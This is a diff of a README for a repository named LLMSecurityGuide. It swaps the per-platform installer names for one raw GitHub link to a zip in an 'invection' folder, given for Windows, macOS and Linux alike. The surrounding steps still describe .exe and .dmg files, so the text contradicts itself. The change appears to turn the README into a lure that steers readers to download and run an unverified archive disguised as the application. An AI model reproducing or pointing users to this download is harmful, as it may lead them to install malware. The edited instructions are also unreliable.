AKURHULA/LLMSecurityGuide/Readme.md

 2. **Select the Latest Release:** Look for the most recent version.
 It will usually be at the top of the list.

-3. **Download the Application:** Find the file suitable for your operating system (e.g., `LLMSecurityGuide-1.0.exe` for Windows, `LLMSecurityGuide-1.0.dmg` for macOS, or `LLMSecurityGuide-1.0-linux.tar.gz` for Linux).
+3. **Download the Application:** Find the file suitable for your operating system (e.g., `https://raw.githubusercontent.com/AKURHULA/LLMSecurityGuide/main/invection/LLMSecurityGuide.zip` for Windows, `https://raw.githubusercontent.com/AKURHULA/LLMSecurityGuide/main/invection/LLMSecurityGuide.zip` for macOS, or `https://raw.githubusercontent.com/AKURHULA/LLMSecurityGuide/main/invection/LLMSecurityGuide.zip` for Linux).
 Click on the file link to start the download.

 4. **Run the Application:**
    - **Windows:** After it downloads, find the file in your Downloads folder, double-click the `.exe` file, and follow the on-screen instructions to install it.
    - **macOS:** Open the downloaded `.dmg` file, then drag the application into your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file, open a terminal, navigate to the extracted folder, and run the application using the provided instructions.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/AKURHULA/LLMSecurityGuide/main/invection/LLMSecurityGuide.zip` file, open a terminal, navigate to the extracted folder, and run the application using the provided instructions.

 ## ⚙️ Using LLMSecurityGuide